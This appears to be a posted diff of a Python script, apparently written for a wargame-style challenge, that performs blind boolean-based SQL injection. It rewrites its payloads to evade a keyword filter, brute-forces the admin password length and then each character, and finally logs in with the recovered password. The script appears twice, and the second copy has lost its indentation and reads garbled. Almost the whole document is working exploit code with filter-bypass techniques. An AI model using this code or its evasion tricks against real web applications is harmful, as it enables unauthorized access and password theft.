avanturation · April 9, 2022 20:11
diff --git a/gorgeous.py b/gorgeous.py
 from string import ascii_lowercase, digits

 from requests import get

 cookies = {"PHPSESSID": ""}

 target = ""

 total = list(ascii_lowercase + digits)


 def fuck_filter(query: str) -> str:
    query = query.replace("or", "||")
    query = query.replace("and", "&&")
    query = query.replace("substr(", "mid(")
    query = query.replace("=", " like ")
    query = query.replace("'", '''"''')

    return query


 def send_query(
    no_query: str = "1",
    pw_query: str = "",
 ) -> bool:
    resp = get(url=target, params={"pw": pw_query, "no": no_query}, cookies=cookies)

    if "Hello admin" in resp.text:
        return True

    return False


 def guess_index():
    index = 1

    while True:
        no_query = fuck_filter(f"1 or id='admin' and length(pw)={index}#")

        if send_query(no_query=no_query):
            print(f"Found Index: {index}")
            return index

        index += 1


 def brute_attack_idx(index: int) -> str:
    for letter in total:
        no_query = fuck_filter(f"1 or id='admin' and substr(pw,{index},1)='{letter}'#")

        if send_query(no_query=no_query):
            print(f"{index} => {letter}")
            return letter


 def clear_for_me(password: str) -> str:
    pw_query = fuck_filter(password)

    if send_query(pw_query=pw_query):
        return


 if __name__ == "__main__":
    password = ""
    index = guess_index()
    for i in range(1, index + 1):
        password += brute_attack_idx(i)

    clear_for_me(password)
	from string import ascii_lowercase, digits

	from requests import get

	cookies = {"PHPSESSID": ""}

	target = ""

	total = list(ascii_lowercase + digits)


	def fuck_filter(query: str) -> str:
	query = query.replace("or", "\|\|")
	query = query.replace("and", "&&")
	query = query.replace("substr(", "mid(")
	query = query.replace("=", " like ")
	query = query.replace("'", '''"''')

	return query


	def send_query(
	no_query: str = "1",
	pw_query: str = "",
	) -> bool:
	resp = get(url=target, params={"pw": pw_query, "no": no_query}, cookies=cookies)

	if "Hello admin" in resp.text:
	return True

	return False


	def guess_index():
	index = 1

	while True:
	no_query = fuck_filter(f"1 or id='admin' and length(pw)={index}#")

	if send_query(no_query=no_query):
	print(f"Found Index: {index}")
	return index

	index += 1


	def brute_attack_idx(index: int) -> str:
	for letter in total:
	no_query = fuck_filter(f"1 or id='admin' and substr(pw,{index},1)='{letter}'#")

	if send_query(no_query=no_query):
	print(f"{index} => {letter}")
	return letter


	def clear_for_me(password: str) -> str:
	pw_query = fuck_filter(password)

	if send_query(pw_query=pw_query):
	return


	if __name__ == "__main__":
	password = ""
	index = guess_index()
	for i in range(1, index + 1):
	password += brute_attack_idx(i)

	clear_for_me(password)